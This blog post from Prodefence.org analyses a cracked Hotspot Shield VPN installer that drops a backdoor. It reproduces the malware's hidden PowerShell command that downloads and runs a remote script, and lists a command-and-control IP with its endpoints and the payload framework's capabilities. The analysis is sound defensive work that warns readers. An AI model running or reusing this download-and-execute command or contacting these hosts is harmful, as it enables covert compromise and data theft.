I have some free time and I try to deal with internet safety. I’m just a small drop of the ocean, but I’m here!
Today I will introduce you something different.
As usual, I downloaded a few softwares and started the analysis.
I have a ”great offer”:
Hotspot Shield VPN 7.20.8.Elite Cracked
Woooow!!!(just kidding)
We have 3 important files.
Setup.exe and Update.exe appear to be archived files and from previous posts we know what this means, but today our target is the HSS v.2.exe file.
![](https://www.prodefence.org/wp-content/uploads/2017/11/payload-backdoor-1-292x300.x10097.png)
![](https://www.prodefence.org/wp-content/uploads/2017/11/payload-backdoor-1-292x300.x10097.png)
It is noticed that it is the latest file created.
Also, the installation method requires using this file.
![](https://www.prodefence.org/wp-content/uploads/2017/11/Empire-payload-malware-300x201.x10097.png)
OK.Let’s scan this time!
Virus Total Report
![](https://www.prodefence.org/wp-content/uploads/2017/11/Virus-total-scan-300x208.x10097.png)
20/68 detection?!?
I mean, only 20 of the antivirus applications will see this file as a virus.
![](https://www.prodefence.org/wp-content/uploads/2017/11/Virus-total-scan-null-296x300.x10097.png)
OK. It’s normal to be seen by antivirus. It’s just a crack, a patch, etc. You have to disable the antivirus to install it, it’s just a pirated software.Let’s get started
It looks like this .exe is actually a .rar archive
![](https://www.prodefence.org/wp-content/uploads/2017/11/sfx-rar-300x257.x10097.png)
After opening, he has a lot of work in the background.
We let him do the job to find out what he is doing!
![](https://www.prodefence.org/wp-content/uploads/2017/11/Process-249x300.x10097.png)
When everything is quiet, we see that something is left to work.
![](https://www.prodefence.org/wp-content/uploads/2017/11/powershell-x-300x74.x10097.png)
powershell.exe -nop -windowstyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1The virus runs through the application Powershell.exe, being connected to external sources.
h**ps://sgist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1raw9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1Also connectiong to:
http://83.251.132.4
/admin/get.php
/login/process.php
/news.php
![](https://www.prodefence.org/wp-content/uploads/2017/11/hampros2-files-300x155.x10097.png)
After investigation I found out that it’s about a payload project.
- Code Execution – Ways to run more code
- Collection – Post exploitation data collection
- Credentials – Collect and use creds
- Exfiltration – Identify egress channels
- Lateral Movement – Move around the network
- Management – Host management and auxilary
- Persistence – Survive reboots
- Privesc – Privilege escalation capabilities
- Recon – Test further entry points (HTTP Basic Auth etc)
- Situational Awareness – Network awareness
- Trollsploit – For the lulz
Prodefence.org
What can I say …. be careful!
Have fun & stay safe!!!
No comments:
Post a Comment